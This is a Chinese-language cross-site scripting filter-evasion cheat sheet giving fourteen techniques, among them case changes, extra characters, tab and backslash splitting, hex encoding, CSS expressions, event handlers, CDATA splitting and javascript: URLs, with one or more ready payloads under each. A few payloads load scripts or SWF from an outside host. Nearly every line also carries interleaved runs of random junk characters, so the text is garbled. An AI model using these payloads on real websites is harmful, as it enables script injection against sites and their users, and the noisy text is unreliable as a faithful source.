1. 改变字符大小写
7 C- V o. x; a5 g
. s# {9 K% N& d; ^' T& } ' @/ F, ~; J! E# U7 O, m
, t8 E$ R; ?6 L$ r% p7 ~6 T+ G <sCript>alert(‘d’)</scRipT>& N `" @( ]4 W- [
, j, ]$ w) N7 I* v3 Z+ J& Z2. 利用多加一些其它字符来规避Regular Expression的检查
* g0 s2 O$ Y h6 b. a w5 ~3 \4 w) E( `4 @; `* _0 ?
<<script>alert(‘c’)//<</script>& p6 |, F9 B0 E g1 Y; w& o
6 J, I" _& Y. B; { <SCRIPT a=">" SRC="t.js"></SCRIPT>
h: ~! g3 G' N. _, y" k5 C' {* X9 N% e
<SCRIPT =">" SRC="t.js"></SCRIPT>7 n' E0 Y3 _: |$ T1 f! W
' H, T- t6 d8 C# }
<SCRIPT a=">" ” SRC="t.js"></SCRIPT>
# c7 [. k! B. ~6 i% f1 K. R* r
; a5 l" y$ _2 v9 U7 S <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>2 ?5 c5 B# J# |! t4 r! l
; S# N7 W7 l4 q/ N' D \ <SCRIPT a=`>` SRC="t.js"></SCRIPT>5 ]+ ?/ i E1 w' ~8 v" z) e" Q, R
( q& L5 d6 H2 w+ h. R
<SCRIPT a=">’>" SRC="t.js"></SCRIPT>" ?9 W! f, z* F! Y) I
! H7 Q9 T4 t9 }! q' n3. 以其它扩展名取代.js
1 j7 [( e Q; Z6 c
% [, ? A1 P4 @8 \ <script src="bad.jpg"></script>$ V/ `4 B& Y% S: W- u; l
% U7 X0 \# ~' r% H/ x4. 将Javascript写在CSS档里
- p, |/ t+ m1 J- S9 I6 [- E* ^5 s
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
/ l/ j! k# X4 ~- H8 w& m' W7 q n" x4 b9 a
example:+ i+ }/ u% g) l% x; a1 M" X* v
7 Z! H4 g2 m% }. K- P/ A body {4 \" X! ^3 |$ T* F
) Y. `; D( R. s1 `. k background-image: url(‘javascript:alert("XSS");’)! X# f$ }2 o$ r/ i( \6 `
8 r# B& \6 B% e0 f9 d
}$ v% ^- M1 V4 K+ I% w. h0 `
" R2 p% t3 `- O) }3 R5. 在script的tag里加入一些其它字符. \2 o1 G: p# l$ \# B
@: M; [8 G" j5 l W <SCRIPT/SRC="t.js"></SCRIPT>
2 G* C& E' \4 |* O5 o+ y0 P: v7 Y) C, W2 {, R
<SCRIPT/anyword SRC="t.js"></SCRIPT>
2 _. P' a1 W- M0 p; m& R$ |# b& S+ u
6. 使用tab或是new line来规避. p# b; p8 h! b) X, ^
) u: b) X/ Z* c( j' K6 n
<img src="jav ascr ipt:alert(‘XSS3′)">
; c) _8 A; n! D/ I' h% @* l, C! [/ R4 H& h7 `# _
<img src="jav ascr ipt:alert(‘XSS3′)">) x+ N5 X8 i; ^ }/ g5 S
# p5 r- L7 B, \1 e- a <IMG SRC="jav ascript:alert(‘XSS’);">8 b- `: o: F+ y8 s$ K! X. s
* t) e* |! F2 j8 s& e -> tag
, [ O) z3 {, T/ {: ?
' g1 [4 H( E& `3 W- ~: x+ o# f -> new line* k8 E( a" D% `) P
' `5 Y6 ?& m' r& o7. 使用"\"来规避
S& w/ |( k9 t5 F& ?
$ ?( u; _" N6 {2 B! f2 z j; l, ^ <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>( d% K: _- h6 L& S3 e
6 z5 o8 |( k" u" U& B
<IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
, k. i* b ?" M. v e
2 x4 } E3 {' B! E <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
3 p. n: A. B. k+ d) L/ E% c }$ u: p1 k$ S; `( x
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
3 Q, t' ~3 ?5 E" f, k8 H, b% Q% T, Z; O# {4 Q" W
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>" L4 B+ p5 V' O0 f# A/ m- [3 [
1 H. A, Y4 a- }, b& t8. 使用Hex encode来规避(也可能会把";"拿掉)
( T. \: U9 _! y- T
% W/ \" V2 c! v- S8 D; L) ]8 { <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">, E, T; G9 Z8 a* F* ]$ P* r6 K n
2 j A4 m8 p+ `' R1 R) k# \ 原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">+ d6 J/ p) F) I8 e' G# j0 {
7 ^& A. @' S# E0 r, d- D" V2 p
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">4 I9 M$ Y" t8 C8 J/ i$ x
+ v4 ^ j8 d3 X
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
$ p* R; z$ S& E/ @9 B+ q Y3 O4 `& ] w# k$ q1 D1 m( u
9. script in HTML tag* J) {8 @% o4 C/ o+ U" m
1 d" _. @5 \5 y: H' F6 m <body onload=」alert(‘onload’)」>2 _, \) n- B* ]( s: J& E7 P
- q3 _& M% x8 p8 y# w
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
6 ?9 s, g. c+ p, y0 n ~
! t; D. p) U; u: F. g2 [5 B* ^0 D10. 在swf里含有xss的code/ w y* l3 J" E0 N. W" @
3 o" R" `, E, o! u
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>) d: e4 a) Q$ p6 e1 D# t/ K3 c
0 k# P: q$ O% ^% S8 O. `& p: k u6 \% b11. 利用CDATA将xss的code拆开,再组合起来。
: F1 H/ Y6 n' a3 P5 y3 ^1 Z2 T1 M6 ^* f! E7 Z! h8 x
<XML ID=I><X><C>
( ^. W4 [' b: ~1 ] I+ b7 p4 J+ o
9 u4 ^- s0 K: g/ k- @- X <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>3 d9 f; W$ Y, h5 p
$ d1 }: {) b" S$ l8 |% V7 G) A </C></X>
' D9 Y/ f# `1 K0 O( t; t9 L0 y/ @7 X( [1 p$ h
</xml>
( Q% ^ W4 t6 z3 X3 e% o- ?# R5 b( n5 z- G! n+ @! i' [; L' R
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
5 C: o: K0 n; m: y0 q* l! k1 m
# |7 s, J8 N, ~0 Z- y7 N7 H# _ <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
: i# O W& Z. i' a
: N0 w+ \/ g. _: B; w; G$ [ <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>1 T( U: E5 h) ?4 h8 A% ~2 C6 F
4 ]* F8 ^, i+ t; ?9 Z9 P( R12. 利用HTML+TIME。! Z I6 w* H& Z6 |9 o
& P6 |' i3 ~3 g+ u <HTML><BODY>
3 [9 ^9 ^' w( |- c7 |% I7 h# b1 X- l) A0 @* @
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">2 R6 o/ N8 e$ _5 O1 m
/ r6 L* ?1 h( f
<?import namespace="t" implementation="#default#time2">/ l6 {2 p# E6 W* V; G0 q
( t/ i+ y5 x; T <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
. s) `: k' z* X0 t. ^1 p/ I8 j# J( V- s) f% ]+ M
</BODY></HTML>( e0 N5 q% z' N; O6 J
$ Z7 r* d& ?- H. R13. 透过META写入Cookie。
" J# L/ c- x; v4 j4 Y' j
3 f) @4 l4 S' o5 k, f* k8 Y: L I <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
$ @0 T i4 W2 v) H! @/ b
# G' K# O: o8 Q: l% y14. javascript in src , href , url
6 C: D, d/ \" I2 x$ P$ n
5 D4 ^4 R$ k: Y6 \+ P ?% x <IFRAME SRC=javascript:alert(’13′)></IFRAME># ^" N8 p' M: c1 @- t M
l5 L. ]- ~- R( |' M0 L
<img src="javascript:alert(‘XSS3′)">
! i- v: z* x; }+ V
1 m5 O: \2 z; Y% ?* Q1 x<IMG DYNSRC="javascript:alert(‘XSS20′)">! P9 s/ e9 p& g4 U; V% X
c+ v5 q5 j& Z; t0 O' i& V5 \- W <IMG LOWSRC="javascript:alert(‘XSS21′)">6 |8 s; q- ^2 f
/ E. ~& h( X9 b, r' ~; W
<LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
3 Z/ @6 g& z# B7 [1 N
' }' |: H+ q) ]! K, g: }6 W <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>+ i! l. A# t" e; J6 v
$ b# {! j1 X: J; ~+ m0 r' A <TABLE BACKGROUND="javascript:alert(‘XSS29′)">
" K2 I) g K. i" s3 t- ?0 W4 k% P
<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
* S$ n" c- p0 s6 R' M( s1 t- j2 ^$ p5 \& W' \) w- F# e9 K
<STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
) k' Z% r/ m, e; N4 r/ o/ r) P8 [$ m
</STYLE><A CLASS=XSS></A>) W' h6 v) v; ?; F
8 Q) O9 t3 n' H1 w1 b# t
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
, [' f J9 g8 u" q E4 z! ~2 \2 N8 O4 W; F9 o4 {7 L( t
|